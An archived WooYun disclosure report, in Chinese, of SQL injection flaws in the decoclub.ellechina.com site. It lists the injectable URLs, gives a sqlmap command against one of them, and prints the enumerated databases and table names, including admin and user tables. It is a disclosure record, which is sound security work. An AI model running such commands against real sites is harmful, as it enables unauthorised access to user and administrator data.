乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-13: 细节已通知厂商并且等待厂商处理中 2014-02-23: 厂商已经主动忽略漏洞,细节向公众公开
注入.
1、注入点
http://decoclub.ellechina.com/calendar_cont.php?calid=12 http://decoclub.ellechina.com/detailopus.php?leftlogin=islogin&uid=34 http://decoclub.ellechina.com/detailopus_cont.php?id=66&uid=34http://decoclub.ellechina.com/detailopus_msg.php?uid=34http://decoclub.ellechina.com/detailopus_pic.php?uid=34http://decoclub.ellechina.com/masterlarge.php?id=7http://decoclub.ellechina.com/msg_act.php?uid=34http://decoclub.ellechina.com/opuslist_cont.php?id=33/2
2、找一点测试
http://decoclub.ellechina.com/calendar_cont.php?calid=12 (GET)
sqlmap.py -u "http://decoclub.ellechina.com/calendar_cont.php?calid=12" --dbms "mysql" --dbs
Database
available databases [2]:[*] information_schema[*] vendor2
Tables
Database: vendor2[55 tables]+--------------------------------------+| deco2013_admin || deco2013_user || deco2013_vote || ellechina_femina_admin || ellechina_femina_award || ellechina_femina_control || ellechina_femina_log || ellechina_femina_member || ellechina_femina_mode || ellechina_femina_msg || ellechina_femina_pointlog || ellechina_femina_staraward || ellechina_femina_vote || elleshop_admin || elleshop_end || elleshop_final || elleshop_player || elleshop_product || esa2011_admin || esa2011_player || esa2011_player_com || esa2011_player_vot || esa2011_user || good8_activity_decodesigner_admin || good8_activity_decodesigner_calendar || good8_activity_decodesigner_control || good8_activity_decodesigner_dsjt || good8_activity_decodesigner_dsjtcont || good8_activity_decodesigner_hjsign || good8_activity_decodesigner_ltype || good8_activity_decodesigner_member || good8_activity_decodesigner_minitype || good8_activity_decodesigner_mode || good8_activity_decodesigner_msg || good8_activity_decodesigner_uppic || good8_activity_decodesigner_vote || grandtour2011_admin || grandtour2011_model || grandtour2011_model_x_votes || grandtour2011_open_car || grandtour2011_users || huayi_admin || huayi_img_auction || huayi_p_auction || huayi_u_auction || huayi_userinfo || itgirl_admin || itgirl_control || itgirl_isopen || itgirl_liuyan || itgirl_player || itgirl_subject || itgirl_user || itgirl_vote || itgirl_zone |+--------------------------------------+
...看详细
过滤~
危害等级:无影响厂商忽略
忽略时间:2014-02-23 15:06
暂无